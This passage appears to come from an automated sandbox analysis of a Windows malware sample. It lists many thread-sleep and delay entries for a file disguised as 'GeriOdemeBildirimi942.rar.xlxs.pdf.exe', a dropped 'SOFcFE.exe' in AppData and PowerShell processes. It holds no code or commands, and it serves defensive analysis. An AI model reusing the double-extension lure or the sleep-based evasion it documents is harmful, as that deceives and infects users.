                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595275Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595145Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594648Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594218Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594053Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593937Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593827Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593718Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593609Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593497Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593390Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593280Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593171Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593061Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592953Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592843Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592731Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592624Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592515Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592406Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599766
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599656
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599547
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599219
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599094
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598984
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598873
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598750
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598640
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598531
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598422
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598271
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598065
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597937
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597769
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597444
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597324
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597217
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597108
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596984
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596873
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596765
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596656
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596546
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596437
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596328
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596218
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596108
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595998
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595889
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595780
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595672
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595561
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595453
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595343
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595234
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595124
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595015
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 594906
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 594789
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 594646
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 594024
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593916
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593719
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593609
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593470
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593356
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593249
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8621Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 929Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8996Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 539Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeWindow / User API: threadDelayed 5697Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeWindow / User API: threadDelayed 4106Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeWindow / User API: threadDelayed 4305
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeWindow / User API: threadDelayed 5534
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 6072Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6060Thread sleep count: 8621 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4428Thread sleep count: 929 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -39660499758475511s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7428Thread sleep count: 5697 > 30Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -599858s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -599734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7428Thread sleep count: 4106 > 30Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -599613s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -599474s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -599350s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -599242s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -599138s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -598874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -598312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -598000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -597853s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -597732s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -597624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -597515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -597406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -597296s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -597187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -597078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -596968s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -596859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -596749s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -596640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -596531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -596421s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -596312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -596203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -596093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -595984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -595873s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -595765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -595656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -595542s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -595405s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -595275s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -595145s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -594648s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -594406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -594218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -594053s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -593937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -593827s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -593718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -593609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -593497s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -593390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -593280s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -593171s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -593061s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -592953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -592843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -592731s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -592624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -592515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408Thread sleep time: -592406s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep count: 41 > 30
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -37815825351104557s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -599875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7800Thread sleep count: 4305 > 30
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -599766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -599656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -599547s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7800Thread sleep count: 5534 > 30
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -599437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -599328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -599219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -599094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -598984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -598873s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -598750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -598640s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -598531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -598422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -598271s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -598065s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -597937s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -597769s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -597444s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -597324s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -597217s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -597108s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -596984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -596873s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -596765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -596656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -596546s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -596437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -596328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -596218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -596108s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595998s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595889s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595780s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595561s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595124s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -595015s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -594906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -594789s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -594646s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -594024s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -593916s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -593719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -593609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -593470s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -593356s >= -30000s
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exe TID: 7796Thread sleep time: -593249s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599858Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599734Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599613Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599474Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599350Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599242Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599138Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 598874Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597853Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597732Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597624Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597296Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596749Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596421Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596093Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595984Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595873Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595765Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595656Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595542Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595405Jump to behavior
